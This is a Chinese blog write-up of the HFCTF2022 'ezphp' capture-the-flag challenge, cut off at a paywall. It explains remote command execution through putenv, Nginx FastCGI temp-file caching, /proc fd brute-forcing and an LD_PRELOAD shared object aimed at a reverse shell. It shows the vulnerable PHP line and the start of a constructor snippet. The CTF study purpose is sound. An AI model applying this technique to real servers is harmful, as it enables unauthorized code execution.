[HFCTF2022]ezphp

snowlyzz

于 2022-10-24 16:59:06 发布

阅读量2.7k

点赞数 1

分类专栏： Fastcgi BUUCTF 文章标签： 1024程序员节网络安全 web安全 php

本文链接：https://blog.youkuaiyun.com/snowlyzz/article/details/127495361

版权

本文详细介绍了HFCTF2022中的一道题目，涉及Nginx-Fastcgi缓存文件的利用。作者通过解析题目的考点和解题思路，阐述了当响应包过大时，Nginx如何创建临时文件，并讨论了如何利用这些临时文件，结合PID和FD遍历，利用LD_PRELOAD加载恶意SO文件，实现命令执行。此外，还探讨了其他可能的临时文件位置及限制条件。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前言：

好久没更过博客，因为一直在补JAVA. 有空了就复现下今年的HF。

考点：

Nginx-Fastcgi 缓存文件

脚本编写遍历pid,fd

解题：

<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>

这题有个putenv 猜测大概流程就是加载恶意的 so 进行反弹shell

此题的考点是 NGINX 在后端 fastcgi 相应过大或者请求正文 body 过大时，会产生临时文件。

如果一个进程打开了某个文件，某个文件就会出现在 /proc/pid/fd/目录下，我们的思路就是通过重复发过大的恶意so文件造成缓存，然后他会存在这个目录下，再使用LD_PRELOAD去加载链接库。

LD_PRELOAD加载so：

这个问题太经典就不说了

#include <stdlib.h>
#include <string.h>
__attribute__ ((constructor)) void call ()
{
	unsetenv("

最低0.47元/天解锁文章